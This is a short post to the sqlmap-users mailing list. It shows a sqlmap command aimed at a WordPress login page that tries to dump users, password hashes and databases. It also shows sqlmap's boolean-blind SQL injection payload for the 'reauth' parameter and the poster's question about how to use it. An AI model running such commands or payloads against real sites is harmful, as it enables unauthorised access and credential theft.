C:\Users\nome\Desktop\sqlmap> python sqlmap.py -u "http://sito.wor
dpress.com/wp-login.php?redirect_to=http%3A%2F%2Fsito.wordpress.com
%2Fwp-admin%2F&reauth=1" -f -b --current-user --current-db --users
--passwords -
-dbs -v1

---
Place: GET
Parameter: reauth
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: redirect_to=http://sito.wordpress.com/wp-admin/&reauth
=1' AND 7608=7608 AND 'Kzgy'='Kzgy

how can be used this injection? I don't understand what AND 7608=7608 AND
'Kzgy'='Kzgy mean..
thx everybody
------------------------------------------------------------------------------
Better than sec? Nothing is better than sec when it comes to
monitoring Big Data applications. Try Boundary one-second 
resolution app monitoring today. Free.
http://p.sf.net/sfu/Boundary-dev2dev
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Reply via email to